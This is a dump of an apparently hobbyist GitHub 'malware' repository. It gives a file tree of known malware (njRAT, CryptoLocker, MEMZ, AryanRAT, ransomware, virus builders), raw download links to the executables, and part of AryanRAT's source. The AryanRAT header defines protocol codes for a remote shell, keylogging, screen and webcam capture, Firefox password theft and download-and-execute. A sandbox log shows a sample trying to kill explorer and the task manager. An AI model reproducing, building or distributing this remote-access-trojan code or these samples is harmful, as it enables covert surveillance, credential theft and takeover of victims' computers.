├── 666
├── 1.bmp
├── 666.exe
├── SDL.dll
├── stderr.txt
└── stdout.txt
├── .gitattributes
├── .gitignore
├── 000
└── 000.exe
├── AryanRAT
├── Client
│ ├── 21_ico_1.ico
│ ├── AryanClient.h
│ ├── AryanRat.plg
│ ├── AryanRatClient.dsp
│ ├── AryanRatClient.dsw
│ ├── AryanRatClient.exe
│ ├── AryanRatClient.ncb
│ ├── AryanRatClient.opt
│ ├── AryanRatClient.plg
│ ├── Default Document_ico_3.ico
│ ├── Hard Drive_ico_5.ico
│ ├── Icon_1.ico
│ ├── Icon_17.ico
│ ├── Icon_18.ico
│ ├── Icon_3.ico
│ ├── Internet Explorer.ico
│ ├── Media Clip_ico_1.ico
│ ├── MyJPEGHandler.h
│ ├── PausePressed.ico
│ ├── Play.ico
│ ├── Stop1NormalRed.ico
│ ├── WINDOWS
│ ├── _default.pif
│ ├── arrow_down.ico
│ ├── arrow_up.ico
│ ├── bags jugs.dat
│ ├── bootstat.dat
│ ├── display-32x32.ico
│ ├── dos.ico
│ ├── drive_cd.ico
│ ├── drive_disk.ico
│ ├── drive_network.ico
│ ├── eula.txt
│ ├── favicon.ico
│ ├── file_pau.ico
│ ├── film.ico
│ ├── firefox-icon.ico
│ ├── firefox.ico
│ ├── folder.ico
│ ├── green.ico
│ ├── hiberfil.sys
│ ├── icon1.ico
│ ├── icon2.ico
│ ├── image.ico
│ ├── main.cpp
│ ├── new(1).ico
│ ├── ntldr
│ ├── orange.ico
│ ├── pagefile.sys
│ ├── process.ico
│ ├── progman_exe_Ico22_ico_Ico1.ico
│ ├── res.rc
│ ├── resource.h
│ ├── upnpnat.cpp
│ ├── upnpnat.h
│ ├── xmlParser.cpp
│ ├── xmlParser.h
│ └── yellow.ico
└── ServerA
│ ├── AryanServer.h
│ ├── AryanServerFWB.dsp
│ ├── AryanServerFWB.dsw
│ ├── AryanServerFWB.ncb
│ ├── AryanServerFWB.opt
│ ├── AryanServerFWB.plg
│ ├── Spread.cpp
│ ├── Spread.h
│ ├── hook.h
│ ├── main.cpp
│ ├── resource.aps
│ ├── resource.h
│ ├── resource.rc
│ └── tiny.h
├── Backdoor
├── Backdoor(na)(np).exe
├── Backdoor(na).exe
├── Backdoor(np).exe
└── Backdoor.exe
├── CODEEVO
├── CODEEVO.bat
├── CODEEVO.exe
└── icon.ico
├── CryptoLocker 2014
├── 1002.exe
└── 1003.exe
├── D3STR0Y3R (test)
├── D3STR0Y3R.exe
├── disableav.bat
└── millionfoldermod.bat
├── DELmE
└── DELmE_s Batch Virus Generator v 2.0.exe
├── DarkHorse VM
├── COMCTL32.OCX
└── DarkHorseTrojanVirusMaker.exe
├── ERROR
└── Error.exe
├── Hotbest
└── hotbest.exe
├── Killsight
├── XXX.docx
└── wordmacromalware.Killsight.txt
├── MEMZ
├── MEMZ.bat
└── MEMZ.exe
├── MasterSlave (test)
├── 1.bmp
├── 2.bmp
├── 3.bmp
├── 4.bmp
├── 5.bmp
├── 6.bmp
├── MasterSlave.exe
├── SDL.dll
└── cursor.cur
├── Mitologia
├── 0a-PORNOSKI.exe
└── smss.exe
├── NJRAT
└── njRAT 0.7d
│ ├── GeoIP.dat
│ ├── NjRAT 0.7d.exe
│ ├── Plugin
│ ├── cam.dll
│ ├── ch.dll
│ ├── mic.dll
│ ├── plg.dll
│ ├── pw.dll
│ └── sc2.dll
│ ├── Stub.manifest
│ ├── WinMM.Net.dll
│ ├── nj_users
│ └── KHALED_PC_Future_22A4A3B1
│ │ └── PASS.txt
│ └── stub.il
├── Putin
└── putin.exe
├── Serpent Ransomware
└── software.exe
├── TheEnd
└── TheEnd.bat
├── Watykańczyk
└── Guide.exe
├── Youareanidiot
├── AxInterop.ShockwaveFlashObjects.dll
├── Interop.ShockwaveFlashObjects.dll
└── YouAreAnIdiot.exe
├── fork.js
└── malware.git
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
4 | # Custom for Visual Studio
5 | *.cs diff=csharp
6 |
7 | # Standard to msysgit
8 | *.doc diff=astextplain
9 | *.DOC diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot diff=astextplain
13 | *.DOT diff=astextplain
14 | *.pdf diff=astextplain
15 | *.PDF diff=astextplain
16 | *.rtf diff=astextplain
17 | *.RTF diff=astextplain
18 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Windows image file caches
2 | Thumbs.db
3 | ehthumbs.db
4 |
5 | # Folder config file
6 | Desktop.ini
7 |
8 | # Recycle Bin used on file shares
9 | $RECYCLE.BIN/
10 |
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 |
17 | # Windows shortcuts
18 | *.lnk
19 |
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 |
24 | # OSX
25 | # =========================
26 |
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 |
31 | # Thumbnails
32 | ._*
33 |
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 |
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 |
--------------------------------------------------------------------------------
/000/000.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/000/000.exe
--------------------------------------------------------------------------------
/666/1.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/666/1.bmp
--------------------------------------------------------------------------------
/666/666.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/666/666.exe
--------------------------------------------------------------------------------
/666/SDL.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/666/SDL.dll
--------------------------------------------------------------------------------
/666/stderr.txt:
--------------------------------------------------------------------------------
1 | File Not Found
2 | Could not find process: explorer.exe
3 | ERROR: Invalid syntax. Value expected for '/IM'.
4 | Type "TASKKILL /?" for usage.
5 | ERROR: Invalid syntax. Value expected for '/IM'.
6 | Type "TASKKILL /?" for usage.
7 | Could not find process: taskmgr
8 | Could not find process: taskmgr.exe
9 | ERROR: Invalid syntax. Value expected for '/IM'.
10 | Type "TASKKILL /?" for usage.
11 | ERROR: Invalid syntax. Value expected for '/IM'.
12 | Type "TASKKILL /?" for usage.
13 | Could not find process: explorer.exe
14 | ERROR: Invalid syntax. Value expected for '/IM'.
15 | Type "TASKKILL /?" for usage.
16 | ERROR: Invalid syntax. Value expected for '/IM'.
17 | Type "TASKKILL /?" for usage.
18 | Could not find process: taskmgr
19 | Could not find process: taskmgr.exe
20 | ERROR: Invalid syntax. Value expected for '/IM'.
21 | Type "TASKKILL /?" for usage.
22 | ERROR: Invalid syntax. Value expected for '/IM'.
23 | Type "TASKKILL /?" for usage.
24 | Could not find process: explorer.exe
25 | ERROR: Invalid syntax. Value expected for '/IM'.
26 | Type "TASKKILL /?" for usage.
27 | ERROR: Invalid syntax. Value expected for '/IM'.
28 | Type "TASKKILL /?" for usage.
29 | Could not find process: taskmgr
30 | Could not find process: taskmgr.exe
31 | ERROR: Invalid syntax. Value expected for '/IM'.
32 | Type "TASKKILL /?" for usage.
33 | ERROR: Invalid syntax. Value expected for '/IM'.
34 | Type "TASKKILL /?" for usage.
35 | Could not find process: explorer.exe
36 | ERROR: Invalid syntax. Value expected for '/IM'.
37 | Type "TASKKILL /?" for usage.
38 | ERROR: Invalid syntax. Value expected for '/IM'.
39 | Type "TASKKILL /?" for usage.
40 | Could not find process: taskmgr
41 | Could not find process: taskmgr.exe
42 | ERROR: Invalid syntax. Value expected for '/IM'.
43 | Type "TASKKILL /?" for usage.
44 | ERROR: Invalid syntax. Value expected for '/IM'.
45 | Type "TASKKILL /?" for usage.
46 | Could not find process: explorer.exe
47 | ERROR: Invalid syntax. Value expected for '/IM'.
48 | Type "TASKKILL /?" for usage.
49 | ERROR: Invalid syntax. Value expected for '/IM'.
50 | Type "TASKKILL /?" for usage.
51 | Could not find process: taskmgr
52 | Could not find process: taskmgr.exe
53 | ERROR: Invalid syntax. Value expected for '/IM'.
54 | Type "TASKKILL /?" for usage.
55 | ERROR: Invalid syntax. Value expected for '/IM'.
56 | Type "TASKKILL /?" for usage.
57 | Could not find process: explorer.exe
58 | ERROR: Invalid syntax. Value expected for '/IM'.
59 | Type "TASKKILL /?" for usage.
60 | ERROR: Invalid syntax. Value expected for '/IM'.
61 | Type "TASKKILL /?" for usage.
62 | Could not find process: taskmgr
63 | Could not find process: taskmgr.exe
64 | ERROR: Invalid syntax. Value expected for '/IM'.
65 | Type "TASKKILL /?" for usage.
66 | ERROR: Invalid syntax. Value expected for '/IM'.
67 | Type "TASKKILL /?" for usage.
68 | Could not find process: explorer
69 | Could not find process: explorer.exe
70 | ERROR: Invalid syntax. Value expected for '/IM'.
71 | Type "TASKKILL /?" for usage.
72 | ERROR: Invalid syntax. Value expected for '/IM'.
73 | Type "TASKKILL /?" for usage.
74 | Could not find process: taskmgr
75 | Could not find process: taskmgr.exe
76 | ERROR: Invalid syntax. Value expected for '/IM'.
77 | Type "TASKKILL /?" for usage.
78 | ERROR: Invalid syntax. Value expected for '/IM'.
79 | Type "TASKKILL /?" for usage.
80 | Could not find process: explorer
81 | Could not find process: explorer.exe
82 | ERROR: Invalid syntax. Value expected for '/IM'.
83 | Type "TASKKILL /?" for usage.
84 | ERROR: Invalid syntax. Value expected for '/IM'.
85 | Type "TASKKILL /?" for usage.
86 | Could not find process: taskmgr
87 | Could not find process: taskmgr.exe
88 | ERROR: Invalid syntax. Value expected for '/IM'.
89 | Type "TASKKILL /?" for usage.
90 | ERROR: Invalid syntax. Value expected for '/IM'.
91 | Type "TASKKILL /?" for usage.
92 | Could not find process: explorer
93 | Could not find process: explorer.exe
94 | ERROR: Invalid syntax. Value expected for '/IM'.
95 | Type "TASKKILL /?" for usage.
96 | ERROR: Invalid syntax. Value expected for '/IM'.
97 | Type "TASKKILL /?" for usage.
98 | Could not find process: taskmgr
99 | Could not find process: taskmgr.exe
100 | ERROR: Invalid syntax. Value expected for '/IM'.
101 | Type "TASKKILL /?" for usage.
102 | ERROR: Invalid syntax. Value expected for '/IM'.
103 | Type "TASKKILL /?" for usage.
104 | Could not find process: explorer
105 | Could not find process: explorer.exe
106 | ERROR: Invalid syntax. Value expected for '/IM'.
107 | Type "TASKKILL /?" for usage.
108 |
--------------------------------------------------------------------------------
/666/stdout.txt:
--------------------------------------------------------------------------------
1 | Volume in drive Z is VBOX_Viruses
2 | Volume Serial Number is 8EB9-9FB2
3 |
4 | Directory of Z:\Malware
5 |
6 |
--------------------------------------------------------------------------------
/AryanRAT/Client/21_ico_1.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/21_ico_1.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanClient.h:
--------------------------------------------------------------------------------
1 | #ifndef __AryanClient_h
2 | #define __AryanClient_h
3 |
4 | #define STATUSA 1980
5 | #define PACKET_ADD_ID 1991
6 | #define PACKET_USER_JOINED 1992
7 | #define PACKET_EXIT 1993
8 | /////////////////////////////////////////////////
9 | //Shell Packet headers
10 | #define PACKET_CMD_RECV 2000
11 | #define PACKET_REMOTE_SHELL_START 2001
12 | /////////////////////////////////////////////////
13 | //Task manager Packet headers
14 | #define PACKET_TASK_MANAGER 2002
15 | #define PACKET_TASK_MANAGER_KILL 2003
16 | #define PACKET_TASK_MANAGER_TASKS 2004
17 | #define PACKET_TASK_MANAGER_KTASK 2005
18 | #define PACKET_TASK_MANAGER_TEXT 2006
19 | /////////////////////////////////////////////////
20 | //File manager Packet headers
21 | #define PACKET_FILE_MANAGER_DRIVE 2010
22 | #define PACKET_FILE_MANAGER_FOLDER 2011
23 | #define PACKET_FILE_MANAGER_FILE 2012
24 | #define PACKET_FILE_MANAGER_FILE_FOLDER 2013
25 | #define PACKET_FILE_MANAGER_FILE_COPY 2014
26 | #define PACKET_FILE_MANAGER_NEW_FOLDER 2015
27 | #define PACKET_FILE_MANAGER_DELETE_FILE 2016
28 | #define PACKET_FILE_MANAGER_FILE_CUT 2017
29 | #define PACKET_FILE_MANAGER_FILE_RENAME 2018
30 | #define PACKET_FILE_MANAGER_FILE_RECV_S 2019
31 | #define PACKET_FILE_MANAGER_FILE_RECV 2020
32 | #define PACKET_FILE_MANAGER_FILE_C 2021
33 | #define PACKET_FILE_MANAGER_FILE_DOWN 2022
34 | #define PACKET_FILE_MANAGER_FILE_UPDATE_WIN 2023
35 | #define PACKET_FILE_MANAGER_SEARCH 2024
36 | #define DONE 2025
37 | #define PACKET_FILE_MANAGER_FILE_EXECUTE 2026
38 | #define PACKET_FILE_MANAGER_FILE_OPEN 2027
39 | #define PACKET_FILE_DOWNLOAD_STAT 2028
40 | /////////////////////////////////////////////////
41 | //Computer Packet headers
42 | #define PACKET_COMPUTER_LOGOFF 2030
43 | #define PACKET_COMPUTER_SHUTDOWN 2031
44 | #define PACKET_COMPUTER_LOCK 2032
45 | /////////////////////////////////////////////////
46 | //Keylogger Packet headers
47 | #define PACKET_KEYLOGGER 2060
48 | #define PACKET_KEYLOGGER_WINDOW 2061
49 | #define PACKET_KEYLOGGER_OFF 2062
50 | #define PACKET_KEYLOG_OFFLINE 2063
51 | #define PACKET_KEYLOG_DOWNLOAD 2064
52 | #define PACKET_KEYLOG_OPEN 2065
53 | #define PACKET_KEYLOG_DOWNLOAD_UPDATE 2066
54 | //////////////////////////////////////////////////
55 | //Screen capture Packet Headers
56 | #define SCREEN_CAPTURE 2050
57 | #define SCREEN_SHOT_OPEN 2051
58 | #define SCREEN_SHOT_CLOSE 2052
59 | #define SCREEN_SHOT_RECV 2053
60 | //////////////////////////////////////////////////
61 | //Passwords Packet headers
62 | #define PASSWORD_FIREFOX 2070
63 | //Services Packet headers
64 | #define PACKET_SERVICE_MAN 2080
65 | #define PACKET_SERVICE_STARTA 2081
66 | #define PACKET_SERVICE_STOPA 2082
67 | //RegManager
68 | #define PACKET_REG_MANAGER 2090
69 | ////////////////////////////////////////////////
70 | //Download Execute
71 | #define PACKET_DOWNLOAD_EXECUTE 3000
72 | ////////////////////////////////////////////////
73 | //Query Installs
74 | #define PACKET_PROGRAM_FILES 3010
75 | #define EXECUTE 3011
76 | ////////////////////////////////////////////////
77 | #define WEBCAM_CAPTURE 3020
78 | ////////////////////////////////////////////////
79 | #define FUN_MONITOR_ON 3030
80 | #define FUN_MONITOR_OFF 3031
81 | #define FUN_OPEN_CD 3032
82 | #define FUN_CLOSE_CD 3033
83 | #define FUN_INVERT_SCREEN_COLOUR 3034
84 | ////////////////////////////////////////////////
85 | #define PICTURE_NAME "Screeny.jpeg"
86 |
87 |
88 | #define MAX_LOADSTRING 100
89 | #define HIMETRIC_INCH 2540
90 | #define MAP_LOGHIM_TO_PIX(x,ppli) ( ((ppli)*(x) + HIMETRIC_INCH/2) / HIMETRIC_INCH )
91 |
92 | typedef struct {
93 | WORD x,y; // dimensions
94 | WORD l; // bytes per scan-line (32-bit allignment)
95 | BYTE *b; // bits of bitmap,3 bytes/pixel, BGR
96 | } tWorkBMP; // 24-bit working bitmap
97 |
98 | struct PACKETHEAD
99 | {
100 | DWORD PacketType;
101 | char Data [512];
102 | char PID [50];
103 | char Threads [50];
104 | char ParentPID [50];
105 | char PRIORITY [50];
106 | char Buf [100];
107 | char Buf2 [50];
108 | char Buf3 [50];
109 | char IDS [10];
110 | int ID;
111 | int ID2;
112 | int ID3;
113 | };
114 |
115 | typedef struct
116 | {
117 | DWORD PacketType;
118 | char Data [4096];
119 | int ID;
120 | int ID2;
121 | int ID3;
122 | int ID4;
123 | } PACKETFILE;
124 | typedef struct
125 | {
126 | DWORD PacketType;
127 | char Data [4096];
128 | int ID;
129 | int ID2;
130 | int ID3;
131 | int ID4;
132 | } PACKETFRECV;
133 |
134 | typedef struct
135 | {
136 | DWORD PacketType;
137 | char Data [4096];
138 | int ID;
139 | } PACKETCMD;
140 |
141 | struct mystruct {
142 | HBITMAP Screen;
143 | int ID;
144 | int ID3;
145 | int ID4;
146 | } ;
147 |
148 | struct FileStruct {
149 | char ID [10];
150 | char IP [50];
151 | };
152 |
153 | #endif
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanRat.plg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/AryanRat.plg
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanRatClient.dsp:
--------------------------------------------------------------------------------
1 | # Microsoft Developer Studio Project File - Name="AryanRatClient" - Package Owner=<4>
2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
3 | # ** DO NOT EDIT **
4 |
5 | # TARGTYPE "Win32 (x86) Application" 0x0101
6 |
7 | CFG=AryanRatClient - Win32 Debug
8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE
11 | !MESSAGE NMAKE /f "AryanRatClient.mak".
12 | !MESSAGE
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE
16 | !MESSAGE NMAKE /f "AryanRatClient.mak" CFG="AryanRatClient - Win32 Debug"
17 | !MESSAGE
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE
20 | !MESSAGE "AryanRatClient - Win32 Release" (based on "Win32 (x86) Application")
21 | !MESSAGE "AryanRatClient - Win32 Debug" (based on "Win32 (x86) Application")
22 | !MESSAGE
23 |
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | MTL=midl.exe
30 | RSC=rc.exe
31 |
32 | !IF "$(CFG)" == "AryanRatClient - Win32 Release"
33 |
34 | # PROP BASE Use_MFC 0
35 | # PROP BASE Use_Debug_Libraries 0
36 | # PROP BASE Output_Dir "Release"
37 | # PROP BASE Intermediate_Dir "Release"
38 | # PROP BASE Target_Dir ""
39 | # PROP Use_MFC 0
40 | # PROP Use_Debug_Libraries 0
41 | # PROP Output_Dir "Release"
42 | # PROP Intermediate_Dir "Release"
43 | # PROP Ignore_Export_Lib 0
44 | # PROP Target_Dir ""
45 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
46 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
47 | # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32
48 | # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
49 | # ADD BASE RSC /l 0x809 /d "NDEBUG"
50 | # ADD RSC /l 0x809 /d "NDEBUG"
51 | BSC32=bscmake.exe
52 | # ADD BASE BSC32 /nologo
53 | # ADD BSC32 /nologo
54 | LINK32=link.exe
55 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /machine:I386
56 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib comctl32.lib /nologo /subsystem:windows /machine:I386
57 |
58 | !ELSEIF "$(CFG)" == "AryanRatClient - Win32 Debug"
59 |
60 | # PROP BASE Use_MFC 0
61 | # PROP BASE Use_Debug_Libraries 1
62 | # PROP BASE Output_Dir "Debug"
63 | # PROP BASE Intermediate_Dir "Debug"
64 | # PROP BASE Target_Dir ""
65 | # PROP Use_MFC 0
66 | # PROP Use_Debug_Libraries 1
67 | # PROP Output_Dir "Debug"
68 | # PROP Intermediate_Dir "Debug"
69 | # PROP Ignore_Export_Lib 0
70 | # PROP Target_Dir ""
71 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
72 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
73 | # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32
74 | # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
75 | # ADD BASE RSC /l 0x809 /d "_DEBUG"
76 | # ADD RSC /l 0x809 /d "_DEBUG"
77 | BSC32=bscmake.exe
78 | # ADD BASE BSC32 /nologo
79 | # ADD BSC32 /nologo
80 | LINK32=link.exe
81 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
82 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib comctl32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
83 |
84 | !ENDIF
85 |
86 | # Begin Target
87 |
88 | # Name "AryanRatClient - Win32 Release"
89 | # Name "AryanRatClient - Win32 Debug"
90 | # Begin Group "Source Files"
91 |
92 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
93 | # Begin Source File
94 |
95 | SOURCE=.\main.cpp
96 | # End Source File
97 | # Begin Source File
98 |
99 | SOURCE=.\upnpnat.cpp
100 | # End Source File
101 | # Begin Source File
102 |
103 | SOURCE=.\xmlParser.cpp
104 | # End Source File
105 | # End Group
106 | # Begin Group "Header Files"
107 |
108 | # PROP Default_Filter "h;hpp;hxx;hm;inl"
109 | # Begin Source File
110 |
111 | SOURCE=.\AryanClient.h
112 | # End Source File
113 | # Begin Source File
114 |
115 | SOURCE=.\MyJPEGHandler.h
116 | # End Source File
117 | # Begin Source File
118 |
119 | SOURCE=.\resource.h
120 | # End Source File
121 | # Begin Source File
122 |
123 | SOURCE=.\upnpnat.h
124 | # End Source File
125 | # Begin Source File
126 |
127 | SOURCE=.\xmlParser.h
128 | # End Source File
129 | # End Group
130 | # Begin Group "Resource Files"
131 |
132 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
133 | # Begin Source File
134 |
135 | SOURCE=.\21_ico_1.ico
136 | # End Source File
137 | # Begin Source File
138 |
139 | SOURCE=.\arrow_down.ico
140 | # End Source File
141 | # Begin Source File
142 |
143 | SOURCE=.\arrow_up.ico
144 | # End Source File
145 | # Begin Source File
146 |
147 | SOURCE=".\Default Document_ico_3.ico"
148 | # End Source File
149 | # Begin Source File
150 |
151 | SOURCE=".\display-32x32.ico"
152 | # End Source File
153 | # Begin Source File
154 |
155 | SOURCE=.\dos.ico
156 | # End Source File
157 | # Begin Source File
158 |
159 | SOURCE=.\drive_cd.ico
160 | # End Source File
161 | # Begin Source File
162 |
163 | SOURCE=.\drive_disk.ico
164 | # End Source File
165 | # Begin Source File
166 |
167 | SOURCE=.\drive_network.ico
168 | # End Source File
169 | # Begin Source File
170 |
171 | SOURCE=.\favicon.ico
172 | # End Source File
173 | # Begin Source File
174 |
175 | SOURCE=.\file_pau.ico
176 | # End Source File
177 | # Begin Source File
178 |
179 | SOURCE=.\film.ico
180 | # End Source File
181 | # Begin Source File
182 |
183 | SOURCE=".\firefox-icon.ico"
184 | # End Source File
185 | # Begin Source File
186 |
187 | SOURCE=.\folder.ico
188 | # End Source File
189 | # Begin Source File
190 |
191 | SOURCE=.\green.ico
192 | # End Source File
193 | # Begin Source File
194 |
195 | SOURCE=".\Hard Drive_ico_5.ico"
196 | # End Source File
197 | # Begin Source File
198 |
199 | SOURCE=.\icon1.ico
200 | # End Source File
201 | # Begin Source File
202 |
203 | SOURCE=.\icon2.ico
204 | # End Source File
205 | # Begin Source File
206 |
207 | SOURCE=.\Icon_17.ico
208 | # End Source File
209 | # Begin Source File
210 |
211 | SOURCE=.\Icon_18.ico
212 | # End Source File
213 | # Begin Source File
214 |
215 | SOURCE=.\image.ico
216 | # End Source File
217 | # Begin Source File
218 |
219 | SOURCE=".\Internet Explorer.ico"
220 | # End Source File
221 | # Begin Source File
222 |
223 | SOURCE=".\Media Clip_ico_1.ico"
224 | # End Source File
225 | # Begin Source File
226 |
227 | SOURCE=".\new(1).ico"
228 | # End Source File
229 | # Begin Source File
230 |
231 | SOURCE=.\Play.ico
232 | # End Source File
233 | # Begin Source File
234 |
235 | SOURCE=.\process.ico
236 | # End Source File
237 | # Begin Source File
238 |
239 | SOURCE=.\res.rc
240 | # End Source File
241 | # Begin Source File
242 |
243 | SOURCE=.\yellow.ico
244 | # End Source File
245 | # End Group
246 | # Begin Source File
247 |
248 | SOURCE=.\DLLinject.exe
249 | # End Source File
250 | # End Target
251 | # End Project
252 |
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanRatClient.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "AryanRatClient"=".\AryanRatClient.dsp" - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanRatClient.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/AryanRatClient.exe
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanRatClient.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/AryanRatClient.ncb
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanRatClient.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/AryanRatClient.opt
--------------------------------------------------------------------------------
/AryanRAT/Client/AryanRatClient.plg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Build Log
5 |
6 | --------------------Configuration: AryanRatClient - Win32 Release--------------------
7 |
8 | Command Lines
9 | Creating temporary file "C:\DOCUME~1\ALBINO~1\LOCALS~1\Temp\RSP1562.tmp" with contents
10 | [
11 | kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib comctl32.lib /nologo /subsystem:windows /incremental:no /pdb:"Release/AryanRatClient.pdb" /machine:I386 /out:"Release/AryanRatClient.exe"
12 | ".\Release\main.obj"
13 | ".\Release\upnpnat.obj"
14 | ".\Release\xmlParser.obj"
15 | ".\Release\res.res"
16 | ]
17 | Creating command line "link.exe @C:\DOCUME~1\ALBINO~1\LOCALS~1\Temp\RSP1562.tmp"
18 | Output Window
19 | Linking...
20 | Creating library Release/AryanRatClient.lib and object Release/AryanRatClient.exp
21 |
22 |
23 |
24 | Results
25 | AryanRatClient.exe - 0 error(s), 0 warning(s)
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/AryanRAT/Client/Default Document_ico_3.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Default Document_ico_3.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Hard Drive_ico_5.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Hard Drive_ico_5.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Icon_1.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Icon_1.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Icon_17.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Icon_17.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Icon_18.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Icon_18.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Icon_3.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Icon_3.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Internet Explorer.ico:
--------------------------------------------------------------------------------
